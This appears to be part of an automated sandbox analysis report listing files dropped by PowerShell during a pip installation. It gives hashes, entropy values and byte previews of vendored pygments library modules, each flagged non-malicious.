                                                                                                    SHA-512:43F736B93E058D26A29759F837C408AC5F7E2FF6DB37091188A5B3FA7E0D25F4E301C0103B44A32BE585523085EA8BBF38A654EFD758B7CD7CC4AC73D25E3D27
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................@.....d.Z.d.d...Z.d...Z...G.d...d.........Z...G.d...d.e.........Z.y.).z.. pygments.filter. ~~~~~~~~~~~~~~~.. Module that implements the default filter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details..Nc.....................2.........f.d...}.|.D.]...}...|.|.|.........}.....|.S.).z.. Use this method to apply an iterable of filters to. a stream. If lexer is given it's forwarded to the. filter, otherwise the filter receives `None`.. c................3....F.....K.....|.j.....................|.........E.d.{.............y.7.....w...N)...filter)...filter_..stream..lexers.... ..gC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/filter.py.._applyz.apply_filters.<locals>._apply....s..............>.>.%....0..0..0.s......!.......!...).r......filtersr....r....r....s.... ` r......apply_filtersr........s(..........1.......).......
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4580
                                                                                                    Entropy (8bit):5.243048590295455
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kCppX+c3BBmgwGvCt798FkwMv/6ypXRIqF9Osqy0:kGH88Fk/7RIUOsY
                                                                                                    MD5:201DE64A9605C7147C33B3C53B37BE56
                                                                                                    SHA1:2B0982C4BEEED7E02ABD58B94CCE112ED4440F69
                                                                                                    SHA-256:B2709BC674114465CAAF1A76377B8535AA14CC5B91818DC7F8261291C9D7135A
                                                                                                    SHA-512:4ED9B9A8109247BEA8768D2C93BAF168AD1632AC1EDE21CCC4CF88CFF9567D521EAF63D808F89E56EC4EB4BFDAC41F1D847DEAE29D21DB6D39BF6D3C011EA6A4
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfR.........................H.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.g.Z.d...Z...G.d...d.........Z.y.).z.. pygments.formatter. ~~~~~~~~~~~~~~~~~~.. Base formatter class... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...get_bool_opt)...get_style_by_name..Formatterc.....................<.....t.........|.t.................r.t.........|.........S.|.S.).N)...isinstance..strr....)...styles.... .jC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/formatter.py.._lookup_styler........s..........%....... ....'..'....L.....c.....................4.....e.Z.d.Z.d.Z.d.Z.g.Z.g.Z.d.Z.d...Z.d.d...Z.d...Z.y.).r....a..... Converts a token stream to text... Formatters should have attributes to help selecting them. These. are similar to the corresponding :class:`~pygments.lexer.Lexer`. attributes... .. autoattribute:: name. :no-value:.. .. auto
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38340
                                                                                                    Entropy (8bit):5.498781454866022
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:AtyVs+HKAeM7MyKZ6fDc4Dv0oXGFoYywXvLRp638kh:AeTcZ64OGFqwfLS3X
                                                                                                    MD5:D63ADC204C86F322CD0BCF995D4C0B2A
                                                                                                    SHA1:E95EC6B6B2B95628DCF8A248F65C045959365DE9
                                                                                                    SHA-256:79EFDCE2B8D0819E04562787620406EC3F28DB2FCFB5595229CB9290CF522A4D
                                                                                                    SHA-512:25B74843D5EB90B1386291BA9C1B672D2E0E03FE88C0B3D00719D28F47481E9B18B6037B48B18358D062E5D931E26309DF14BB3DC831BFECD85688C7798697D6
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf:.........................X.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z...e.j2..................d.........Z.g.d...Z...e.d...........Z...G.d...d.e.........Z...G.d...d.e...........Z ..G.d...d.e ........Z!..G.d...d.e"........Z#..G.d...d.........Z$..e$........Z%..G.d...d.e&........Z'..G.d...d.........Z(d...Z)..G.d...d.........Z*..e*........Z+d...Z,..G.d...d ........Z-..G.d!..d"e.........Z...G.d#..d$e.........Z/..G.d%..d&e e/..........Z0..G.d'..d(........Z1..G.d)..d*e0........Z2d+..Z3..G.d,..d-e/........Z4..G.d...d/e0e4..........Z5y.)0z.. pygments.lexer. ~~~~~~~~~~~~~~.. Base lexer classes... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...apply_filters..Filter)...get_filter_by_name)...Error..Text..Other..Whitespace.._TokenType)...get_bool_opt..get_int_opt..get_list_opt..make_analysator..Future..guess
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1579
                                                                                                    Entropy (8bit):5.575039711396838
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Trkx/GAoq3qk8/7Yi2wYFoJ3foSCt5mQkB4r2ZVpamaN81ajAnG4ZrKI6id7wx:Trkx/GJ6UPBs5mQkVVy8U4ZrsiFwx
                                                                                                    MD5:1D5C959477B829F77AF35A16A87BA27A
                                                                                                    SHA1:0007962C8187E5CA77961741997713A7C2C4CBEB
                                                                                                    SHA-256:D5C5943E8CCF1239D35F47CEDCBE2E93E0E0E4DC1B66EF8D0153A8B37F844C3D
                                                                                                    SHA-512:7A5E68EF48D1941434E2B9CFF546A9E4C377DF4970B6FC39C1A8C24C50C5BA54147F091796A405C4C93D635F0CF41108430B0CA8A631A9A2419C52DCC0E006E9
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................^.....d.Z.d.d.l.Z.d.g.Z...e.j...................d.e.j...........................Z.d...Z.d.d...Z.y.).z.. pygments.modeline. ~~~~~~~~~~~~~~~~~.. A simple modeline parser (based on pymodeline)... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N..get_filetype_from_bufferze. (?: vi | vim | ex ) (?: [<=>]? \d* )? :. .* (?: ft | filetype | syn | syntax ) = ( [^:\s]+ ).c.....................T.....t.........j...................|.........}.|.r.|.j...................d.........S.y.).N.....)...modeline_re..search..group)...l..ms.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/modeline.py..get_filetype_from_liner........s(...............1....A.......w.w.q.z.............c...........................|.j...........................}.|.d.|...d.z...d.......D.]...}.t.........|.........}.|.s...|.c...S...t.........|.d.d.........D.]%..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3407
                                                                                                    Entropy (8bit):5.525586685767953
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:8WOhRbZ6mQ4Aa4vRpmCgVVGtEUc5dSs+yBMRMbdD+PCwPTVGBRPKuomiAAiyyiiG:KhRbZ6rNLvOCWVOEUcxMCQ0BVpoT
                                                                                                    MD5:8B4489F28F0BAC7EC5546DEC56783BD2
                                                                                                    SHA1:71F7BB56A91956F17F55940013FA90A71A9F5E93
                                                                                                    SHA-256:E58A5A838FDF3FB49573DE025807B762C7E62AA256DCA34F82FF122B6D30446E
                                                                                                    SHA-512:B3806DD666168B1500C5BF20493DF0B9AD2823C9E881DE3270621B470232F0A351847150DD40DCAC7F5ACB568A02E19E64CDD7F22BF4C67CA1E25486CCE7BE11
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................6.....d.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).a..... pygments.plugin. ~~~~~~~~~~~~~~~.. Pygments plugin interface. By default, this tries to use. ``importlib.metadata``, which is in the Python standard. library since Python 3.8, or its ``importlib_metadata``. backport for earlier versions of Python. It falls back on. ``pkg_resources`` if not found. Finally, if ``pkg_resources``. is not found either, no plugins are loaded at all... lexer plugins::.. [pygments.lexers]. yourlexer = yourmodule:YourLexer.. formatter plugins::.. [pygments.formatters]. yourformatter = yourformatter:YourFormatter. /.ext = yourformatter:YourFormatter.. As you can see, you can define extensions for the formatter. with a leading slash... syntax plugins::.. [pygments.styles]. yourstyle = yourstyle:YourStyle.. filter plugin::.. [pygments.filter]. yourfilter = y
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4092
                                                                                                    Entropy (8bit):5.5876366149602354
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:xZeiiTrACsTJsoV/MsH54Q1uuu1woeFpBFaxP2MN1OU:CoCsTJsoNV5Kuu1HIBgxP2MN1OU
                                                                                                    MD5:E86C381B14D3072033EC0D115D246135
                                                                                                    SHA1:4F99126CC831BD162D97D9E17A4A25E3DB020856
                                                                                                    SHA-256:62269E1B90C101654AC4F34B16A31A7C8D7E4EF9B34553D86176310CE79AC374
                                                                                                    SHA-512:BDCF3E4039F430423498D33E7908E1A68280ADE9AF564FCCF9935ECFA554C2D6752F7348C6289779C9B8F499BF7E1C72FE3826ADE4668198FF64108302CA90DE
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................d.........Z...e.d.........Z.d...Z.d...Z.d.d...Z.y.).a..... pygments.regexopt. ~~~~~~~~~~~~~~~~~.. An algorithm that generates optimized regexes for matching long lists of. literal strings... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...escape)...commonprefix)...groupby)...itemgetterz.[\[\^\\\-\]]c.....................Z.....d.t.........j...................d...d.j...................|.................z...d.z...S.).N..[c.....................(.....d.|.j...........................z...S.).N..\)...group)...ms.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/regexopt.py..<lambda>z.make_charset.<locals>.<lambda>....s.................)9...........])...CS_ESCAPE..sub..join)...letterss.... r......make_charsetr........s'..............
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4767
                                                                                                    Entropy (8bit):5.022456956968866
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:0Eit5EKk5fMcVwMM/h97ffyk/gIzQ0Aj4NPcwpqzve:ritn/cVwMMX73yzIqjePvYz2
                                                                                                    MD5:F570098B56880AB3FB6698FD43CED475
                                                                                                    SHA1:3E7688B78313C79F02295C1CB1FAC2F973B94470
                                                                                                    SHA-256:30E324EB575535A7823BC32E17AD43DE4913DA3AC1C169354BCFC960D0A7ADEF
                                                                                                    SHA-512:B67DE238CC23704A78FA0685F232931F5D0BF6D0DB48E305BE4D14DFA7E7EC198E3AF074062D41E1AB1E1941F878E4D57BF6A2E1A5616B7F1103297B4137CFEA
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................:.....d.Z.d.d.l.Z...G.d...d.e.........Z...G.d...d.........Z.y.).a..... pygments.scanner. ~~~~~~~~~~~~~~~~.. This library implements a regex based scanner. Some languages. like Pascal are easy to parse but have some keywords that. depend on the context. Because of this it's impossible to lex. that just by using a regular expression lexer like the. `RegexLexer`... Have a look at the `DelphiLexer` to get an idea of how to use. this scanner... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......Nc...........................e.Z.d.Z.d.Z.y.)...EndOfTextzZ. Raise if end of text is reached and the user. tried to call a match function.. N)...__name__..__module__..__qualname__..__doc__........hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/scanner.pyr....r........s...........r....r....c.....................b....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11057
                                                                                                    Entropy (8bit):5.345110498869594
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:MMxMGaRyuY4EkU5LTs3iCB7Pe7FS5OTiecqyLGp40pQvsXEAfyOcW2cRtQRr4AFa:f2EWUpVfMz0zVQkXEAfWuRtQoJpO+
                                                                                                    MD5:D18F20170C29AE438A2A53E17705D102
                                                                                                    SHA1:3531C2F45BE56108F2C73386DB83C745DEEF88ED
                                                                                                    SHA-256:9A5F2877688F8F61E378627B2EE71197C4934FEFECE557DCEA1AA690CFF1D585
                                                                                                    SHA-512:95A1ABAABF8C1444B1C8A9B7E5BA15EACB4F2F2D023A7CA9091E641E3B775C4B6FE357739CEEC24B573541E65F8CFE7925B0F9674BF3D3B677FF12BBC8625DC8
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................l.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z...G.d...d.e.........Z.d...Z.y.).a..... pygments.sphinxext. ~~~~~~~~~~~~~~~~~~.. Sphinx extension to generate automatic documentation of lexers,. formatters and filters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...nodes)...ViewList)...Directive)...nested_parse_with_titlesz.... module:: %s..%s.%s.zX... class:: %s.. :Short names: %s. :Filenames: %s. :MIME types: %s.. %s..zA... class:: %s.. :Short names: %s. :Filenames: %s.. %s..z'... class:: %s.. :Name: %s.. %s..c.....................B.....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...PygmentsDoczn. A directive to collect all lexers/formatters/filters and generate. autoclass directives for them.. F.....r....c..........................t.................|._.........|.j.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6685
                                                                                                    Entropy (8bit):5.784152606796973
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:DOWbtBrxXaCpLr/0GDQQ6bCRuTRt6vov+6H6N0+ClMTYAzin05adK:ykqiv/0GsrTfJkbCdn05aU
                                                                                                    MD5:DF6AF7575596339A9C3778D9652ADD68
                                                                                                    SHA1:FB20151182D3A3DB6E754500F394D13247717E51
                                                                                                    SHA-256:6F73D7F98DE49E95E9504ADDBCE48E7A529C39BC12B1E5623D69346B2F7C7FD4
                                                                                                    SHA-512:9F4E0D6673A00B8E9839B3831DB7482E27001CBC94216629C72440EB526DFB08A4B6A75F75C249B38B7DFC1E18561B9FB3D2309F346E6A7017AA06D0C6D70BDF
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfq...............................d.Z.d.d.l.m.Z.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..Z.i.d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d!..Z...e.e.........Z...G.d3..d4e.........Z...G.d5..d6e..7........Z.y8)9z.. pygments.style. ~~~~~~~~~~~~~~.. Basic style object... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Token..STANDARD_TYPES..ansiblack..000000..ansired..7f0000..ansigreen..007f00..ansiyellow..7f7fe0..ansiblue..00007f..ansimagenta..7f007f..ansicyan..007f7f..ansigray..e5e5e5..ansibrightblack..555555..ansibrightred..ff0000..ansibrightgreen..00ff00..ansibrightyellow..ffff00..ansibrightblue..0000ff..ansibrightmagenta..ff00ff..ansibrightcyan..00ffff..ansiwhite..ffffffz.#ansiblackz.#ansidarkredz.#ansidarkgreenz.#ansibrownz.#ansidarkbluez.#ansipurplez.#ansitealz.#ansilightgrayz.#ans
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8153
                                                                                                    Entropy (8bit):5.203011340997149
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7fm4Auxsd5aK/T/nEOE2c9t1KjediXJrMLF88o:hAuxysST3E2c9tGediZro88o
                                                                                                    MD5:07461EEA5840E8041DF94BD1EDF14CCC
                                                                                                    SHA1:995F969451935DAD9CB322310A219712DECBEABE
                                                                                                    SHA-256:1F650ED3B6755A60EC23D2A043130D3BB3F45EAEDAE4E598314565E07F274DE8
                                                                                                    SHA-512:3A03EB98B6405A087060BDD4D3C17866D9881BF4A1B7AF87D136FAB7931AAB884E073F66D593EC0EE15B3663A9300192604033A364B2835883B764F167F46D7D
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf(...............................d.Z...G.d...d.e.........Z...e.........Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j ..................Z.e.j"..................Z.e.e._.........e.e._.........e.e._.........d...Z.d...Z.i.e.d...e.d...e.d...e.d...e.d...e.d...e.d...e.j(..................d...e.j*..................d...e.j,..................d...e.j...................d...e.j0..................d...e.j2..................d...e.d...e.j4..................d...e.j6..................d...e.j6..................j...................d...i.e.j8..................d...e.j(..................d...e.j:..................d...e.j<..................d...e.j>..................d...e.j@..................d...e.j@..................jB..................d...e.jD..............
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32999
                                                                                                    Entropy (8bit):6.29249273919867
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:4GqAJsUe2glKVaCxJNmJAokJE5l2o5VTr9iU/:4XAOfWVaCxJ/JE5lZTr3
                                                                                                    MD5:E4A40FA20E250BCDFE95CC9FD4CB062F
                                                                                                    SHA1:1F1A1D962742962B5CD1DCBFB256B4D5D7BD2B08
                                                                                                    SHA-256:929F098B44E28C9DACE22DF5ECCE327476725F5D204DB307E45CD0EBCEEEA329
                                                                                                    SHA-512:72C24C748F8CA599056EBEB17FF9B8983A0DAE905AD81656D2CB96EB3A7BA8870E1E4833756B72641D9764A7DA132806392F2BBA3E231B478373A007FCEF3B55
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z g.d!..Z!d"..Z"d#..Z#d$..Z$e%d%k(....r.d&d'l&Z&g.g.d(..Z'..e(e)d).*........5.Z*e*jW..........................Z,d'd'd'..........e,d'e,j[..................d+..........Z.e,e,j[..................d,........d'..Z/..e0d-........D.]...Z1..e2e1........Z3..e&jh..................e3........Z5..e6e3........d.k(..r.d/e3z...Z3n...e6e3........d0v.r.d/e3z...Z3e'jo..................e5g.........jq..................e3..........e3js..........................r.e'd1....jq..................e3..........d2e3z...js..........................s...e'd3....jq..................e3................e(e)d4d).*........5.Z*e*ju..................e.............e;e'........D.]3..Z5d5jy....................e$e'e5....................Z=e*ju..................e5..d6e=..d7.............5....e;e'........Z!e!j}..................d1..........e!j}..................d3..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):13992
                                                                                                    Entropy (8bit):5.4663763600817115
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:1H1bp5yTrzIm3UMWXHfV3IphWK8X9WISw8jEGARH:t1bcr0GU1/VYHWK8XUTw8wGARH
                                                                                                    MD5:51F4E64F8732F8C77DC1E44E17923D1E
                                                                                                    SHA1:F280877FD2FBD16E4266B797B15B7868AF147ED1
                                                                                                    SHA-256:9F60AAAC20AED2AFB0CCD5E7DCA15BF09EFE4D0DFF94FDCF8EA0FB2FEA4A71B6
                                                                                                    SHA-512:D513596C6C5E161652B1DD229CCC7FDED3DDED66F91F17DD9FE4FBCBAC539FBFEB15549C35457577FEAB50244AE46193E31AA1CFD59858A3D62C1EFE0AEEECFC
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.'..............................d.Z.d.d.l.Z.d.d.l.m.Z.....e.j...................d.........Z...e.j...................d.e.j...................e.j...................z...e.j...................z...........Z...e.j...................d.e.j...................e.j...................z...e.j...................z...........Z...e.j...................d.e.j...........................Z...G.d...d.e.........Z...G.d...d.e.........Z.d d...Z.d!d...Z.d!d...Z.d!d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.i.Z.d...Z.d...Z.d"d...Z.d#d...Z...G.d...d.........Z d...Z!d...Z"d...Z#..G.d...d.e.........Z$y.)$z.. pygments.util. ~~~~~~~~~~~~~.. Utility functions... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...TextIOWrapperz.[/\\ ]z.. <!DOCTYPE\s+(. [a-zA-Z_][a-zA-Z0-9]*. (?: \s+ # optional in HTML5. [a-zA-Z_][a-zA-Z0-9]*\s+. "[^"]*")?. ). [^>]*>.z.<(.+?)(\s.*?)?>.*?</.+?>z.\s*<\?xml[^>]*\?>c..........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23685
                                                                                                    Entropy (8bit):4.340463405573033
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:iJqsoXfnnzl4Z0TSEjXNnocCVPbloBSYdqbazFd7j:iJqdnnzl4ZISoocCVPZoBSYdjzD7j
                                                                                                    MD5:06DD41C17DFB35881CE4E23C30534863
                                                                                                    SHA1:375F2C67E11155E43CD3C847DFA0F47E10F9F449
                                                                                                    SHA-256:6F2C58269F609E355ECA1465677513320A3F2E191787569FBCDF30241B4071CF
                                                                                                    SHA-512:2F9EA61F311437DEE840E7CE10C3EAFDAD68D9D0A1DB2FB2EAFFC2B81ABA24A4931045A7BCA3CE71C84F9ABF817B83D713A1B9671D91EC33D29C1B7692263930
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.cmdline. ~~~~~~~~~~~~~~~~.. Command line interface... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import os.import sys.import shutil.import argparse.from textwrap import dedent..from pip._vendor.pygments import __version__, highlight.from pip._vendor.pygments.util import ClassNotFound, OptionError, docstring_headline, \. guess_decode, guess_decode_from_terminal, terminal_encoding, \. UnclosingTextIOWrapper.from pip._vendor.pygments.lexers import get_all_lexers, get_lexer_by_name, guess_lexer, \. load_lexer_from_file, get_lexer_for_filename, find_lexer_class_for_filename.from pip._vendor.pygments.lexers.special import TextLexer.from pip._vendor.pygments.formatters.latex import LatexEmbeddedLexer, LatexFormatter.from pip._vendor.pygments.formatters import get_all_formatters, get_formatter_by_name, \. load_formatter_from_file, get_formatter_for_filename, find_formatter_class.from
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1697
                                                                                                    Entropy (8bit):4.779934860652409
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:YlGG1dsgllfLnfvZCofuIih1XXkabBZAGFkvJkbZ/gulgY:YkgyglljfBCquIU1XXpq24uCY
                                                                                                    MD5:450B87DD5878B793336B090297EC6309
                                                                                                    SHA1:8630C1C81F6D8B641F7C3711441EDD186B0B1657
                                                                                                    SHA-256:DB06795BE53A4EE7490F5FCD2D4C237253296E898533DD6536FD75FFAD2C7C66
                                                                                                    SHA-512:BE126F818E4F2B1639D8F55C30B245A82D8BED28E71FC79D48A513E65F6A5AE5C3F86C147E30B82140C1E2E5461BDA07B8B978E8F89A889096E46E8C8255AD5B
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.console. ~~~~~~~~~~~~~~~~.. Format colored console output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..esc = "\x1b["..codes = {}.codes[""] = "".codes["reset"] = esc + "39;49;00m"..codes["bold"] = esc + "01m".codes["faint"] = esc + "02m".codes["standout"] = esc + "03m".codes["underline"] = esc + "04m".codes["blink"] = esc + "05m".codes["overline"] = esc + "06m"..dark_colors = ["black", "red", "green", "yellow", "blue",. "magenta", "cyan", "gray"].light_colors = ["brightblack", "brightred", "brightgreen", "brightyellow", "brightblue",. "brightmagenta", "brightcyan", "white"]..x = 30.for d, l in zip(dark_colors, light_colors):. codes[d] = esc + "%im" % x. codes[l] = esc + "%im" % (60 + x). x += 1..del d, l, x..codes["white"] = codes["bold"]...def reset_color():. return codes["reset"]...def colorize(color_key, text):. return codes[color_key] + text
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1938
                                                                                                    Entropy (8bit):4.488825294219764
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:YaSGaQSjtuBmyy0TLLy09/jxOQUX+ibnM8abOS2DowxWw5Ro:YaS5QSRugyzHLy09/jBlibM8A3wU
                                                                                                    MD5:B9D28DC447A3D3AB9116636D683039A5
                                                                                                    SHA1:87FEDEAF657DD9DC7C191B1C3C9461B59514239D
                                                                                                    SHA-256:8F968B33D6BDC12C7A787D68CB8EF7A12909D3684658DA6D065568E2CD60FF7D
                                                                                                    SHA-512:DEEAFC1AD7D38F93EBBC06838E758390D1550A048052E59A5A5AB65096D7C45E2AE073BFDA6F0132626EC319902E4AAE375B90C71AB568EBED182BBFE9189196
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.filter. ~~~~~~~~~~~~~~~.. Module that implements the default filter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""...def apply_filters(stream, filters, lexer=None):. """. Use this method to apply an iterable of filters to. a stream. If lexer is given it's forwarded to the. filter, otherwise the filter receives `None`.. """. def _apply(filter_, stream):. yield from filter_.filter(lexer, stream). for filter_ in filters:. stream = _apply(filter_, stream). return stream...def simplefilter(f):. """. Decorator that converts a function into a filter::.. @simplefilter. def lowercase(self, lexer, stream, options):. for ttype, value in stream:. yield ttype, value.lower(). """. return type(f.__name__, (FunctionFilter,), {. '__module__': getattr(f, '__module__'),. '__doc__': f.__doc__,. 'funct
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40386
                                                                                                    Entropy (8bit):3.934104313489659
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:qCFI4li9kb1xljrGSV+vjecMcyZb77zQIB39yMR8nEzNXeA++QNecS4tOKBYnV:qCF5DjEvfWtIR0KmV
                                                                                                    MD5:CB08F0D464B3AFAD4348A007FCD2583E
                                                                                                    SHA1:C166F4460E3DA0CEA2FFE9F54CBDE12801EE53F6
                                                                                                    SHA-256:87F928624505A3E1455318ECE7AE091D4033ECEDF226957023A7CA377318CC6D
                                                                                                    SHA-512:6D76C1A33D2838A38ED5CA188F5E1ADCE7FE03C5EA7FFEBE9653B0D352725AB1E5D9EBA71CC1B68104E8BDD1EEF47D79D52E9F76CC99DA0BDD68AA35D545887A
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.filters. ~~~~~~~~~~~~~~~~.. Module containing filter lookup functions and default. filters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re..from pip._vendor.pygments.token import String, Comment, Keyword, Name, Error, Whitespace, \. string_to_tokentype.from pip._vendor.pygments.filter import Filter.from pip._vendor.pygments.util import get_list_opt, get_int_opt, get_bool_opt, \. get_choice_opt, ClassNotFound, OptionError.from pip._vendor.pygments.plugin import find_plugin_filters...def find_filter_class(filtername):. """Lookup a filter by name. Return None if not found.""". if filtername in FILTERS:. return FILTERS[filtername]. for name, cls in find_plugin_filters():. if name == filtername:. return cls. return None...def get_filter_by_name(filtername, **options):. """Return an instantiated filter... Options are passed to the filt
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):37947
                                                                                                    Entropy (8bit):6.103019866133882
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:mPox+b28PUaojniUBbf06K+P7VozxFRpYy1YKJ0D:mPosd8aorRD0z+P7VIFR6y1zi
                                                                                                    MD5:426DE002E82E273C5E13459E29A6639B
                                                                                                    SHA1:F09DD8CCBEB0D589B55DCF302D27864D1965683F
                                                                                                    SHA-256:68C8A53BB5E30CD58E320CC86DAFCAD0BFD45DA34A2259A22F5C27FA0A2884DE
                                                                                                    SHA-512:1673458DE67FE4D4824346F299CF815E251327F9D80D1A8FF5FA0CE2F5E187594D1F50D5EC438CCF06159982460E0F92D7AA4B929F4DF094CFCA7A3E82B191C0
                                                                                                    Malicious:false
